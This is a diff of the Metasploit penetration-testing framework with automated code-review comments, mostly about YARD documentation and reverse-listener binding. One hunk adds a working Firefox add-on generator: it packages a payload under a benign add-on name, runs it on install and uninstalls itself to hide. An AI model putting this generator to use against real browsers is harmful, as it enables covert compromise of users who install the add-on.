+ # @return [void] + # @example Save 'Cat' => 'Foo' in group 'ExampleGroup' + # save( + # 'ExampleGroup' => + # { + # 'Foo' => 'Cat' + # }) def self.save(opts) self.new.save(opts) end - # # Updates the config class' self with the default hash. # + # @return [Hash] the updated Hash. def initialize update(Defaults) end - # # Returns the installation root directory # + # @return [String] the installation root directory {InstallRoot}. def install_root InstallRoot end - # # Returns the configuration directory default. # + # @return [String] the root configuration directory. def config_directory self['ConfigDirectory'] end - # # Returns the full path to the configuration file. # + # @return [String] path to the configuration file. def config_file config_directory + FileSep + self['ConfigFile'] end + # Returns the full path to the history file. # - # Returns the full path to the configuration file. - # + # @return [String] path the history file. def history_file config_directory + FileSep + "history" end - # # Returns the global module directory. # + # @return [String] path to global module directory. def module_directory install_root + FileSep + self['ModuleDirectory'] end - # # Returns the path that scripts can be loaded from. # + # @return [String] path to script directory. def script_directory install_root + FileSep + self['ScriptDirectory'] end - # # Returns the directory that log files should be stored in. # + # @return [String] path to log directory. def log_directory config_directory + FileSep + self['LogDirectory'] end - # # Returns the directory that plugins are stored in. # + # @return [String] path to plugin directory. def plugin_directory install_root + FileSep + self['PluginDirectory'] end - # # Returns the directory in which session log files are to reside. # + # @return [String] path to session log directory. 
def session_log_directory config_directory + FileSep + self['SessionLogDirectory'] end - # # Returns the directory in which captured data will reside. # + # @return [String] path to loot directory. def loot_directory config_directory + FileSep + self['LootDirectory'] end - # # Returns the directory in which locally-generated data will reside. # + # @return [String] path to locally-generated data directory. def local_directory config_directory + FileSep + self['LocalDirectory'] end - # # Returns the user-specific module base path # + # @return [String] path to user-specific modules directory. def user_module_directory config_directory + FileSep + "modules" end - # # Returns the user-specific plugin base path # + # @return [String] path to user-specific plugin directory. def user_plugin_directory config_directory + FileSep + "plugins" end - # # Returns the user-specific script base path # + # @return [String] path to user-specific script directory. def user_script_directory config_directory + FileSep + "scripts" end - # # Returns the data directory # + # @return [String] path to data directory. def data_directory install_root + FileSep + self['DataDirectory'] end - # # Initializes configuration, creating directories as necessary. # + # @return [void] def init FileUtils.mkdir_p(module_directory) FileUtils.mkdir_p(config_directory) 
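Review bot: The new YARD block on `self.save` documents `@option opts 'ConfigFile' [Hash]`, but the value is used as a file path (`Rex::Parser::Ini.new(opts['ConfigFile'] || config_file)` in the last hunk of this file), so the type should read `[String]`. The same block is repeated on the instance method `save` in the `@@ -320,27 +331,31 @@` hunk. The example title is inverted relative to its body: `@example Save 'Cat' => 'Foo' in group 'ExampleGroup'` should be `@example Save 'Foo' => 'Cat' in group 'ExampleGroup'`. `@return [String] path the history file.` is missing `to` on both `history_file` methods. Since `loot_directory` and `session_log_directory` are now documented as holding captured data and session logs, the `init` comment could also say which permissions those directories get, if `init` is what creates them (only part of its body is visible here).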
@@ -320,27 +331,31 @@ class Config < Hash FileUtils.mkdir_p(user_plugin_directory) end - # # Loads configuration from the supplied file path, or the default one if # none is specified. # + # @param path [String] the path to the configuration file. + # @return [Rex::Parser::Ini] INI file parser. def load(path = nil) path = config_file if (!path) return Rex::Parser::Ini.new(path) end - # # Saves configuration to the path specified in the ConfigFile hash key or - # the default path is one isn't specified. The options should be group - # references that have named value pairs. Example: - # - # save( - # 'ExampleGroup' => - # { - # 'Foo' => 'Cat' - # }) + # the default path if one isn't specified. The options should be group + # references that have named value pairs. # + # @param opts [Hash] Hash containing configuration options. + # @option opts 'ConfigFile' [Hash] configuration file these options apply + # to. + # @return [void] + # @example Save 'Cat' => 'Foo' in group 'ExampleGroup' + # save( + # 'ExampleGroup' => + # { + # 'Foo' => 'Cat' + # }) def save(opts) ini = Rex::Parser::Ini.new(opts['ConfigFile'] || config_file) diff --git a/lib/msf/base/logging.rb b/lib/msf/base/logging.rb index ccf6315dc9..0a0c475c5b 100644 --- a/lib/msf/base/logging.rb +++ b/lib/msf/base/logging.rb @@ -4,19 +4,19 @@ require 'msf/base' module Msf -### -# # This module provides an initialization interface for logging. -# -### class Logging + #Is logging initialized + #@private @@initialized = false + #Is session logging enabled + #@private @@session_logging = false - # # Initialize logging. # + # @return [void] def self.init if (! @@initialized) @@initialized = true 
@@ -35,9 +35,13 @@ class Logging end end + # Enables a log source of name src. Creates the .log file in the + # configured directory if logging is not already enabled for this + # source. # - # Enables a log source. - # + # @param src [String] log source name. + # @param level [Integer] logging level. + # @return [void] def self.enable_log_source(src, level = 0) if (log_source_registered?(src) == false) f = Rex::Logging::Sinks::Flatfile.new( @@ -47,30 +51,33 @@ class Logging end end - # # Stops logging for a given log source. # + # @param src [String] the log source to disable. + # @return [Boolean] true if successful. false if not. def self.disable_log_source(src) deregister_log_source(src) end - # # Sets whether or not session logging is to be enabled. # + # @param tf [Boolean] true if enabling. false if disabling. + # @return [void] def self.enable_session_logging(tf) @@session_logging = tf end - # # Returns whether or not session logging is enabled. # + # @return [Boolean] true if enabled. false if disabled. def self.session_logging_enabled? @@session_logging || false end - # # Starts logging for a given session. # + # @param session [Msf::Session] the session to start logging on. + # @return [void] def self.start_session_log(session) if (log_source_registered?(session.log_source) == false) f = Rex::Logging::Sinks::Flatfile.new( @@ -82,9 +89,10 @@ class Logging end end - # # Stops logging for a given session. # + # @param session [Msf::Session] the session to stop logging. + # @return [Boolean] true if sucessful. false if not. def self.stop_session_log(session) rlog("\n[*] Logging stopped: #{Time.now}\n\n", session.log_source) diff --git a/lib/msf/base/persistent_storage.rb b/lib/msf/base/persistent_storage.rb index 8cbac93137..b7f93a01f6 100644 --- a/lib/msf/base/persistent_storage.rb +++ b/lib/msf/base/persistent_storage.rb 
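Review bot: The `@return [Boolean]` tags added to `disable_log_source` and `stop_session_log` state a result that these hunks do not establish: the first returns whatever `deregister_log_source` returns, and the body of the second continues outside the hunk. Either confirm the helper's return value or document `@return [void]`. `sucessful` in the `stop_session_log` tag should be `successful`. The `#Is logging initialized` / `#@private` comments added in the first hunk of this file would read better with a space after `#`, as in `# Is logging initialized`, matching the other comments.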
@@ -1,24 +1,25 @@ # -*- coding: binary -*- module Msf -### -# # This class provides a generalized interface to persisting information, # either in whole or in part, about the state of the framework. This can # be used to store data that can later be reinitialized in a new instance # of the framework or to provide a simple mechanism for generating reports # of some form. # -### +# @abstract Subclass and override {#initialize}, {#store}, and {#fetch}. class PersistentStorage @@storage_classes = {} - # # Creates an instance of the storage class with the supplied name. The # array supplied as an argument is passed to the constructor of the # associated class as a means of generic initialization. # + # @param name [String] the name of the storage class. + # @param params [Object] the parameters to give the new class. + # @return [PersistentStorage] the newly created class. + # @return [nil] if class has not been added through {.add_storage_class}. def self.create(name, *params) if (klass = @@storage_classes[name]) klass.new(*params) 
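Review bot: The `@return [PersistentStorage] the newly created class` tag on `create` describes the wrong thing, since `klass.new(*params)` returns an instance of the registered class. `params` is a splat, so `[Object]` undersells it as well. I would use `# @param params [Array] arguments forwarded to the storage class constructor.` and `# @return [PersistentStorage] a new instance of the registered storage class.` The rest of `create` lies outside the hunk.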
@@ -27,36 +28,42 @@ class PersistentStorage end end - # # Stub initialization routine that takes the params passed to create. # + # @param params [Object] the parameters to initialize with. def initialize(*params) end - # # This methods stores all or part of the current state of the supplied # framework instance to whatever medium the derived class implements. # If the derived class does not implement this method, the # NotImplementedError is raised. # + # @param framework [Msf::Framework] framework state to store. + # @return [void] no implementation. + # @raise [NotImpementedError] raised if not implemented. def store(framework) raise NotImplementedError end - # # This method initializes the supplied framework instance with the state # that is stored in the persisted backing that the derived class # implements. If the derived class does not implement this method, the # NotImplementedError is raised. # + # @param framework [Msf::Framework] framework to restore state to. + # @return [void] no implementation. + # @raise [NotImplementedError] raised if not implemented. def fetch(framework) raise NotImplementedError end - # # This method adds a new storage class to the hash of storage classes that # can be created through create. # + # @param name [String] the name of the storage class. + # @param klass [PersistentStorage] the storage class to add. + # @return [void] def self.add_storage_class(name, klass) @@storage_classes[name] = klass end diff --git a/lib/msf/base/persistent_storage/flatfile.rb b/lib/msf/base/persistent_storage/flatfile.rb index 15ce4bb94e..aa4c724ba9 100644 --- a/lib/msf/base/persistent_storage/flatfile.rb +++ b/lib/msf/base/persistent_storage/flatfile.rb 
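Review bot: The tag added to `store` is misspelled as `@raise [NotImpementedError]`, so YARD cannot link it to the exception class the method actually raises; `fetch` just below has it right. Both methods also carry `@return [void] no implementation.`, which is misleading for a body that always raises. I would drop the `@return` line and write `# @raise [NotImplementedError] always, unless a subclass overrides this method.` On `add_storage_class`, `klass` is a class rather than an instance (`create` calls `klass.new`), so `[Class<PersistentStorage>]` is the accurate type.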
@@ -2,30 +2,29 @@ module Msf class PersistentStorage -### -# # This class persists the state of the framework to a flatfile in a human # readable format. At the moment, the level of information it conveys is # rather basic and ugly, but this is just a prototype, so it will be improved. # Oh yes, it will be improved. -# -### class Flatfile < PersistentStorage - # # Initializes the flatfile for storage based on the parameters specified. # The hash must contain a FilePath attribute. # + # @overload initialize(path) + # Initializes the flatfile with the set path. + # @param path [String] path of the flatfile. def initialize(*params) raise ArgumentError, "You must specify a file path" if (params.length == 0) self.path = params[0] end - # # This method stores the current state of the framework in human readable # form to a flatfile. This can be used as a reporting mechanism. # + # @param framework [Msf:::Framework] the Framework to store. + # @return [void] def store(framework) # Open the supplied file path for writing. self.fd = File.new(self.path, "w") @@ -41,10 +40,11 @@ protected attr_accessor :fd, :path # :nodoc: - # # This method stores general information about the current state of the # framework instance. # + # @param framework [Msf::Framework] the Framework to store. + # @return [void] def store_general(framework) fd.print( "\n" + diff --git a/lib/msf/base/serializer/readable_text.rb b/lib/msf/base/serializer/readable_text.rb index 3e018a188c..5200b4d14c 100644 --- a/lib/msf/base/serializer/readable_text.rb +++ b/lib/msf/base/serializer/readable_text.rb 
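Review bot: The `store` tag reads `@param framework [Msf:::Framework]` with three colons, which is not a resolvable constant path; it should be `# @param framework [Msf::Framework] the framework to store.` The retained sentence "The hash must contain a FilePath attribute" now contradicts both the new `@overload initialize(path)` and the body, which takes `params[0]` as the path, so that sentence should go. Since `store` opens the path with `File.new(self.path, "w")`, the doc should also say that an existing file at that path is truncated. The body of `store` continues outside the hunk.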
@@ -2,22 +2,22 @@ module Msf module Serializer -### -# # This class formats information in a plain-text format that # is meant to be displayed on a console or some other non-GUI # medium. -# -### class ReadableText + #Default number of characters to wrap at. DefaultColumnWrap = 70 + #Default number of characters to indent. DefaultIndent = 2 - # # Returns a formatted string that contains information about # the supplied module instance. # + # @param mod [Msf::Module] the module to dump information for. + # @param indent [String] the indentation to use. + # @return [String] formatted text output of the dump. def self.dump_module(mod, indent = " ") case mod.type when MODULE_PAYLOAD @@ -37,9 +37,14 @@ class ReadableText end end - # # Dumps an exploit's targets. # + # @param mod [Msf::Exploit] the exploit module to dump targets + # for. + # @param indent [String] the indentation to use (only the length + # matters). + # @param h [String] the string to display as the table heading. + # @return [String] the string form of the table. def self.dump_exploit_targets(mod, indent = '', h = nil) tbl = Rex::Ui::Text::Table.new( 'Indent' => indent.length, @@ -57,9 +62,13 @@ class ReadableText tbl.to_s + "\n" end - # # Dumps the exploit's selected target # + # @param mod [Msf::Exploit] the exploit module. + # @param indent [String] the indentation to use (only the length + # matters) + # @param h [String] the string to display as the table heading. + # @return [String] the string form of the table. def self.dump_exploit_target(mod, indent = '', h = nil) tbl = Rex::Ui::Text::Table.new( 'Indent' => indent.length, 
@@ -75,9 +84,13 @@ class ReadableText tbl.to_s + "\n" end - # # Dumps an auxiliary's actions # + # @param mod [Msf::Auxiliary] the auxiliary module. + # @param indent [String] the indentation to use (only the length + # matters) + # @param h [String] the string to display as the table heading. + # @return [String] the string form of the table. def self.dump_auxiliary_actions(mod, indent = '', h = nil) tbl = Rex::Ui::Text::Table.new( 'Indent' => indent.length, @@ -95,10 +108,14 @@ class ReadableText tbl.to_s + "\n" end - # # Dumps the table of payloads that are compatible with the supplied # exploit. # + # @param exploit [Msf::Exploit] the exploit module. + # @param indent [String] the indentation to use (only the length + # matters) + # @param h [String] the string to display as the table heading. + # @return [String] the string form of the table. def self.dump_compatible_payloads(exploit, indent = '', h = nil) tbl = Rex::Ui::Text::Table.new( 'Indent' => indent.length, @@ -116,9 +133,11 @@ class ReadableText tbl.to_s + "\n" end - # # Dumps information about an exploit module. # + # @param mod [Msf::Exploit] the exploit module. + # @param indent [String] the indentation to use. + # @return [String] the string form of the information. def self.dump_exploit_module(mod, indent = '') output = "\n" output << " Name: #{mod.name}\n" @@ -171,9 +190,11 @@ class ReadableText end - # # Dumps information about an auxiliary module. # + # @param mod [Msf::Auxiliary] the auxiliary module. + # @param indent [String] the indentation to use. + # @return [String] the string form of the information. def self.dump_auxiliary_module(mod, indent = '') output = "\n" output << " Name: #{mod.name}\n" 
@@ -207,9 +228,11 @@ class ReadableText return output end - # # Dumps information about a payload module. # + # @param mod [Msf::Payload] the payload module. + # @param indent [String] the indentation to use. + # @return [String] the string form of the information. def self.dump_payload_module(mod, indent = '') # General output = "\n" @@ -244,9 +267,11 @@ class ReadableText return output end - # # Dumps information about a module, just the basics. # + # @param mod [Msf::Module] the module. + # @param indent [String] the indentation to use. + # @return [String] the string form of the information. def self.dump_basic_module(mod, indent = '') # General output = "\n" @@ -277,13 +302,16 @@ class ReadableText end + #No current use def self.dump_generic_module(mod, indent = '') end - # # Dumps the list of options associated with the # supplied module. # + # @param mod [Msf::Module] the module. + # @param indent [String] the indentation to use. + # @return [String] the string form of the information. def self.dump_options(mod, indent = '') tbl = Rex::Ui::Text::Table.new( 'Indent' => indent.length, @@ -309,9 +337,11 @@ class ReadableText return tbl.to_s end - # # Dumps the advanced options associated with the supplied module. # + # @param mod [Msf::Module] the module. + # @param indent [String] the indentation to use. + # @return [String] the string form of the information. def self.dump_advanced_options(mod, indent = '') output = '' pad = indent @@ -333,9 +363,11 @@ class ReadableText return output end - # # Dumps the evasion options associated with the supplied module. # + # @param mod [Msf::Module] the module. + # @param indent [String] the indentation to use. + # @return [String] the string form of the information. def self.dump_evasion_options(mod, indent = '') output = '' pad = indent 
@@ -358,6 +390,11 @@ class ReadableText return output end + # Dumps the references associated with the supplied module. + # + # @param mod [Msf::Module] the module. + # @param indent [String] the indentation to use. + # @return [String] the string form of the information. def self.dump_references(mod, indent = '') output = '' @@ -372,9 +409,13 @@ class ReadableText output end - # # Dumps the contents of a datastore. # + # @param name [String] displayed as the table header. + # @param ds [Msf::DataStore] the DataStore to dump. + # @param indent [Integer] the indentation size. + # @param col [Integer] the column width. + # @return [String] the formatted DataStore contents. def self.dump_datastore(name, ds, indent = DefaultIndent, col = DefaultColumnWrap) tbl = Rex::Ui::Text::Table.new( 'Indent' => indent, @@ -392,9 +433,17 @@ class ReadableText return ds.length > 0 ? tbl.to_s : "#{tbl.header_to_s}No entries in data store.\n" end - # # Dumps the list of active sessions. # + # @param framework [Msf::Framework] the framework to dump. + # @param opts [Hash] the options to dump with. + # @option opts :session_ids [Array] the list of sessions to dump (no + # effect). + # @option opts :verbose [Boolean] gives more information if set to + # true. + # @option opts :indent [Integer] set the indentation amount. + # @option opts :col [Integer] the column wrap width. + # @return [String] the formatted list of sessions. def self.dump_sessions(framework, opts={}) ids = (opts[:session_ids] || framework.sessions.keys).sort verbose = opts[:verbose] || false 
@@ -437,12 +486,14 @@ class ReadableText return framework.sessions.length > 0 ? tbl.to_s : "#{tbl.header_to_s}No active sessions.\n" end - # # Dumps the list of running jobs. # - # If verbose is true, also prints the payload, LPORT, URIPATH and start - # time, if they exist, for each job. - # + # @param framework [Msf::Framework] the framework. + # @param verbose [Boolean] if true, also prints the payload, LPORT, URIPATH + # and start time, if they exist, for each job. + # @param indent [Integer] the indentation amount. + # @param col [Integer] the column wrap width. + # @return [String] the formatted list of running jobs. def self.dump_jobs(framework, verbose = false, indent = DefaultIndent, col = DefaultColumnWrap) columns = [ 'Id', 'Name' ] @@ -479,10 +530,13 @@ class ReadableText return framework.jobs.keys.length > 0 ? tbl.to_s : "#{tbl.header_to_s}No active jobs.\n" end - # # Jacked from Ernest Ellingson , modified # a bit to add indention # + # @param str [String] the string to wrap. + # @param indent [Integer] the indentation amount. + # @param col [Integer] the column wrap width. + # @return [String] the wrapped string. def self.word_wrap(str, indent = DefaultIndent, col = DefaultColumnWrap) return Rex::Text.wordwrap(str, indent, col) end diff --git a/lib/msf/core/exploit/mixins.rb b/lib/msf/core/exploit/mixins.rb index 1da0a5a5a1..d1bd31a508 100644 --- a/lib/msf/core/exploit/mixins.rb +++ b/lib/msf/core/exploit/mixins.rb @@ -98,4 +98,7 @@ require 'msf/core/exploit/winrm' # WebApp require 'msf/core/exploit/web' +# Firefox addons +require 'msf/core/exploit/remote/firefox_addon_generator' + require 'msf/core/exploit/remote/browser_exploit_server' diff --git a/lib/msf/core/exploit/remote/browser_exploit_server.rb b/lib/msf/core/exploit/remote/browser_exploit_server.rb index d9c94c5b78..87f4f82ebd 100644 --- a/lib/msf/core/exploit/remote/browser_exploit_server.rb +++ b/lib/msf/core/exploit/remote/browser_exploit_server.rb 
@@ -92,6 +92,15 @@ module Msf "#{get_resource.chomp("/")}/#{@exploit_receiver_page}" end + # + # Returns the absolute URL to the module's resource that points to on_request_exploit + # + # @return [String] absolute URI to the exploit page + # + def get_module_uri + "#{get_uri.chomp("/")}/#{@exploit_receiver_page}" + end + # # Returns the current target # @@ -166,8 +175,10 @@ module Msf # Special keys to ignore because the script registers this as [:activex] = true or false next if k == :clsid or k == :method - if v.class == Regexp + if v.is_a? Regexp bad_reqs << k if profile[k.to_sym] !~ v + elsif v.is_a? Proc + bad_reqs << k unless v.call(profile[k.to_sym]) else bad_reqs << k if profile[k.to_sym] != v end diff --git a/lib/msf/core/exploit/remote/firefox_addon_generator.rb b/lib/msf/core/exploit/remote/firefox_addon_generator.rb new file mode 100644 index 0000000000..85d3d879db --- /dev/null +++ b/lib/msf/core/exploit/remote/firefox_addon_generator.rb 
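Review bot: The new `elsif v.is_a? Proc` branch passes `profile[k.to_sym]` to the callable with no statement of what the callable may receive or must return. When the profile has no entry for that key the callable gets `nil`, and any exception it raises propagates out of the requirements check instead of marking the requirement unmet. I would document the contract where the requirement types are described, e.g. `# A Proc receives the profile value (nil if the key was not reported) and must return true when the requirement is met.` The branch above also moved from `v.class == Regexp` to `is_a?`, which is the better form. The enclosing method starts and ends outside the hunk.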
@@ -0,0 +1,174 @@ +# -*- coding: binary -*- + +### +# +# The FirefoxAddonGenerator allows a firefox exploit module to serve a malicious .xpi +# addon that will gain a session. +# +### + +module Msf +module Exploit::Remote::FirefoxAddonGenerator + + # Add in the supported datastore options + def initialize( info = {} ) + super(update_info(info, + 'Platform' => %w{ java linux osx solaris win }, + 'Payload' => { 'BadChars' => '', 'DisableNops' => true }, + 'Targets' => + [ + [ 'Generic (Java Payload)', + { + 'Platform' => ['java'], + 'Arch' => ARCH_JAVA + } + ], + [ 'Windows x86 (Native Payload)', + { + 'Platform' => 'win', + 'Arch' => ARCH_X86, + } + ], + [ 'Linux x86 (Native Payload)', + { + 'Platform' => 'linux', + 'Arch' => ARCH_X86, + } + ], + [ 'Mac OS X PPC (Native Payload)', + { + 'Platform' => 'osx', + 'Arch' => ARCH_PPC, + } + ], + [ 'Mac OS X x86 (Native Payload)', + { + 'Platform' => 'osx', + 'Arch' => ARCH_X86, + } + ] + ], + 'DefaultTarget' => 1 + )) + + register_options( [ + OptString.new('ADDONNAME', [ true, + "The addon name.", + "HTML5 Rendering Enhancements" + ]), + OptBool.new('AutoUninstall', [ true, + "Automatically uninstall the addon after payload execution", + true + ]) + ], self.class) + end + + # @return [Rex::Zip::Archive] containing a .xpi, ready to be served with the + # 'application/x-xpinstall' MIME type + def generate_addon_xpi + if target.name == 'Generic (Java Payload)' + jar = p.encoded_jar + jar.build_manifest(:main_class => "metasploit.Payload") + payload_file = jar.pack + payload_name='payload.jar' + payload_script=%q| + var java = Components.classes["@mozilla.org/appshell/window-mediator;1"].getService(Components.interfaces.nsIWindowMediator).getMostRecentWindow('navigator:browser').Packages.java + java.lang.System.setSecurityManager(null); + var cl = new java.net.URLClassLoader([new java.io.File(tmp.path).toURI().toURL()]); + var m = cl.loadClass("metasploit.Payload").getMethod("main", 
[java.lang.Class.forName("[Ljava.lang.String;")]); + m.invoke(null, [java.lang.reflect.Array.newInstance(java.lang.Class.forName("java.lang.String"), 0)]); + | + else + payload_file = generate_payload_exe + payload_name = Rex::Text.rand_text_alphanumeric(8) + '.exe' + payload_script=%q| + var process=Components.classes["@mozilla.org/process/util;1"].createInstance(Components.interfaces.nsIProcess); + process.init(tmp); + process.run(false,[],0); + | + if target.name != 'Windows x86 (Native Payload)' + payload_script = %q| + var chmod=Components.classes["@mozilla.org/file/local;1"].createInstance(Components.interfaces.nsILocalFile); + chmod.initWithPath("/bin/chmod"); + var process=Components.classes["@mozilla.org/process/util;1"].createInstance(Components.interfaces.nsIProcess); + process.init(chmod); + process.run(true, ["+x", tmp.path], 2); + | + payload_script + end + end + + zip = Rex::Zip::Archive.new + xpi_guid = Rex::Text.rand_guid + bootstrap_script = %q| +function startup(data, reason) { + var file = Components.classes["@mozilla.org/file/directory_service;1"]. + getService(Components.interfaces.nsIProperties). + get("ProfD", Components.interfaces.nsIFile); + file.append("extensions"); + | + bootstrap_script << %Q|xpi_guid="#{xpi_guid}";| + bootstrap_script << %Q|payload_name="#{payload_name}";| + bootstrap_script << %q| + file.append(xpi_guid); + file.append(payload_name); + var tmp = Components.classes["@mozilla.org/file/directory_service;1"]. + getService(Components.interfaces.nsIProperties). 
+ get("TmpD", Components.interfaces.nsIFile); + tmp.append(payload_name); + tmp.createUnique(Components.interfaces.nsIFile.NORMAL_FILE_TYPE, 0666); + file.copyTo(tmp.parent, tmp.leafName); + | + bootstrap_script << payload_script + + if (datastore['AutoUninstall']) + bootstrap_script << %q| + try { // Fx < 4.0 + Components.classes["@mozilla.org/extensions/manager;1"].getService(Components.interfaces.nsIExtensionManager).uninstallItem(xpi_guid); + } catch (e) {} + try { // Fx 4.0 and later + Components.utils.import("resource://gre/modules/AddonManager.jsm"); + AddonManager.getAddonByID(xpi_guid, function(addon) { + addon.uninstall(); + }); + } catch (e) {} + | + end + + bootstrap_script << "}" + + zip.add_file('bootstrap.js', bootstrap_script) + zip.add_file(payload_name, payload_file) + zip.add_file('chrome.manifest', "content\t#{xpi_guid}\t./\noverlay\tchrome://browser/content/browser.xul\tchrome://#{xpi_guid}/content/overlay.xul\n") + zip.add_file('install.rdf', %Q| + + + #{xpi_guid} + #{datastore['ADDONNAME']} + 1.0 + true + true + + + toolkit@mozilla.org + 1.0 + * + + + + + {ec8030f7-c20a-464f-9b0e-13a3a9e97384} + 1.0 + * + + + +|) + zip.add_file('overlay.xul', %q| + + +|) + zip + end +end +end diff --git a/lib/msf/core/handler/reverse_http.rb b/lib/msf/core/handler/reverse_http.rb index 583de796e2..94e9376fae 100644 --- a/lib/msf/core/handler/reverse_http.rb +++ b/lib/msf/core/handler/reverse_http.rb 
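Review bot: `generate_addon_xpi` reads `p.encoded_jar` in the Java branch, but the method has no parameter or local named `p`. Unless the including module defines a `p` method, the name resolves to `Kernel#p`, which returns nil when called without arguments. The dependency should be explicit in the signature rather than implied. The YARD block should also list what the mixin expects from its host, because `target`, `datastore` and `generate_payload_exe` are all used here without being defined in this file. The `initialize` comment says it adds datastore options, yet the method also overrides 'Platform', 'Payload', 'Targets' and 'DefaultTarget' through `update_info`; that is worth stating because it silently replaces values set by the including module.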
@@ -83,23 +83,10 @@ module ReverseHttp # addresses. # def full_uri - unless datastore['HIDDENHOST'].nil? or datastore['HIDDENHOST'].empty? - lhost = datastore['HIDDENHOST'] - else - lhost = datastore['LHOST'] - end - if lhost.empty? or lhost == "0.0.0.0" or lhost == "::" - lhost = Rex::Socket.source_address - end - lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost) + addrs = bind_address + local_port = bind_port scheme = (ssl?) ? "https" : "http" - unless datastore['HIDDENPORT'].nil? or datastore['HIDDENPORT'] == 0 - uri = "#{scheme}://#{lhost}:#{datastore["HIDDENPORT"]}/" - else - uri = "#{scheme}://#{lhost}:#{datastore["LPORT"]}/" - end - - uri + "#{scheme}://#{addrs[0]}:#{local_port}/" end # @@ -163,6 +150,7 @@ module ReverseHttp OptString.new('MeterpreterUserAgent', [ false, 'The user-agent that the payload should use for communication', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)' ]), OptString.new('MeterpreterServerName', [ false, 'The server header that the handler will send in response to requests', 'Apache' ]), OptAddress.new('ReverseListenerBindAddress', [ false, 'The specific IP address to bind to on the local system']), + OptInt.new('ReverseListenerBindPort', [ false, 'The port to bind to on the local system if different from LPORT' ]), OptString.new('HttpUnknownRequestResponse', [ false, 'The returned HTML response body when the handler receives a request that is not from a payload', '
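Review bot: The rewritten `full_uri` drops the IPv6 bracket wrapping that the removed code applied with `Rex::Socket.is_ipv6?`, so an IPv6 address from `bind_address` yields a malformed URL such as `http://::1:8443/`. It also loses the old substitution of `Rex::Socket.source_address` for a wildcard host, so a bind address of `0.0.0.0` is now emitted literally. I would keep the bracket step, e.g. `host = Rex::Socket.is_ipv6?(addrs[0]) ? "[#{addrs[0]}]" : addrs[0]`. The URL is now derived from the bind address and port rather than from LHOST/LPORT; whether callers expect the listener's or the advertised endpoint is outside this hunk and should be confirmed and stated in the comment.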

It works!

' ]) ], Msf::Handler::ReverseHttp) end @@ -186,17 +174,13 @@ module ReverseHttp comm = nil end - # Determine where to bind the HTTP(S) server to - bindaddrs = ipv6 ? '::' : '0.0.0.0' - - if not datastore['ReverseListenerBindAddress'].to_s.empty? - bindaddrs = datastore['ReverseListenerBindAddress'] - end + local_port = bind_port + addrs = bind_address # Start the HTTPS server service on this host/port self.service = Rex::ServiceManager.start(Rex::Proto::Http::Server, - datastore['LPORT'].to_i, - bindaddrs, + local_port, + addrs[0], ssl?, { 'Msf' => framework, @@ -413,6 +397,33 @@ protected obj.service.close_client( cli ) end +protected + + def bind_port + port = datastore['ReverseListenerBindPort'].to_i + port > 0 ? port : datastore['LPORT'].to_i + end + + def bind_address + # Switch to IPv6 ANY address if the LHOST is also IPv6 + addr = Rex::Socket.resolv_nbo(datastore['LHOST']) + # First attempt to bind LHOST. If that fails, the user probably has + # something else listening on that interface. Try again with ANY_ADDR. + any = (addr.length == 4) ? "0.0.0.0" : "::0" + + addrs = [ Rex::Socket.addr_ntoa(addr), any ] + + if not datastore['ReverseListenerBindAddress'].to_s.empty? + # Only try to bind to this specific interface + addrs = [ datastore['ReverseListenerBindAddress'] ] + + # Pick the right "any" address if either wildcard is used + addrs[0] = any if (addrs[0] == "0.0.0.0" or addrs == "::0") + end + + addrs + end + end diff --git a/lib/msf/core/handler/reverse_https_proxy.rb b/lib/msf/core/handler/reverse_https_proxy.rb index 10ec427f6b..1cc216f6d6 100644 --- a/lib/msf/core/handler/reverse_https_proxy.rb +++ b/lib/msf/core/handler/reverse_https_proxy.rb 
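Review bot: `ReverseListenerBindPort` is registered with `OptInt`, whereas the listener port option in this same commit uses `OptPort` (`OptPort.new('LPORT', ...)` in reverse_https_proxy.rb). An integer option has no port-range validation, and `bind_port` only tests `port > 0`, so a value above 65535 reaches the socket layer unchecked. I would declare it as `OptPort.new('ReverseListenerBindPort', [ false, 'The port to bind to on the local system if different from LPORT' ])`. The same declaration is repeated in reverse_https_proxy.rb, reverse_tcp.rb and reverse_tcp_ssl.rb.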
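Review bot: Only `addrs[0]` is handed to `Rex::ServiceManager.start`, so the wildcard fallback that `bind_address` returns as its second element is never tried here, unlike the `addrs.each` loop in reverse_tcp.rb. The default bind also changes from the wildcard address to the resolved LHOST. If LHOST is not an address on a local interface, the service now fails to start where it previously bound to `0.0.0.0` or `::`. Either iterate over `addrs` as the TCP handler does, or note the behaviour change beside the call, e.g. `# binds to LHOST only; set ReverseListenerBindAddress when LHOST is not a local address`. The enclosing method starts and ends outside the hunk.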
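Review bot: In `bind_address` the wildcard check compares the whole array to a string (`addrs == "::0"`), which is always false, so an IPv6 wildcard in ReverseListenerBindAddress is never normalised. The line should read `addrs[0] = any if addrs[0] == "0.0.0.0" || addrs[0] == "::0"`, and a plain `"::"` probably deserves the same treatment. The identical `bind_port`/`bind_address` pair is pasted into reverse_tcp.rb and reverse_tcp_ssl.rb with the same defect; moving both into one shared module would leave a single copy to fix. The added `protected` keyword appears redundant, as the hunk header suggests the section is already protected.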
@@ -42,13 +42,17 @@ module ReverseHttpsProxy OptPort.new('LPORT', [ true, "The local listener port", 8443 ]), OptString.new('PROXYHOST', [true, "The address of the http proxy to use" ,"127.0.0.1"]), OptInt.new('PROXYPORT', [ false, "The Proxy port to connect to", 8080 ]), - OptString.new('HIDDENHOST', [false, "The tor hidden host to connect to, when set it will be used instead of LHOST for stager generation"]), - OptInt.new('HIDDENPORT', [ false, "The hidden port to connect to, when set it will be used instead of LPORT for stager generation"]), OptEnum.new('PROXY_TYPE', [true, 'Http or Socks4 proxy type', 'HTTP', ['HTTP', 'SOCKS']]), OptString.new('PROXY_USERNAME', [ false, "An optional username for HTTP proxy authentification"]), OptString.new('PROXY_PASSWORD', [ false, "An optional password for HTTP proxy authentification"]) ], Msf::Handler::ReverseHttpsProxy) + register_advanced_options( + [ + OptAddress.new('ReverseListenerBindAddress', [ false, 'The specific IP address to bind to on the local system']), + OptInt.new('ReverseListenerBindPort', [ false, 'The port to bind to on the local system if different from LPORT' ]) + ], Msf::Handler::ReverseHttpsProxy) + end end diff --git a/lib/msf/core/handler/reverse_tcp.rb b/lib/msf/core/handler/reverse_tcp.rb index fb7b042660..62d220ade3 100644 --- a/lib/msf/core/handler/reverse_tcp.rb +++ b/lib/msf/core/handler/reverse_tcp.rb 
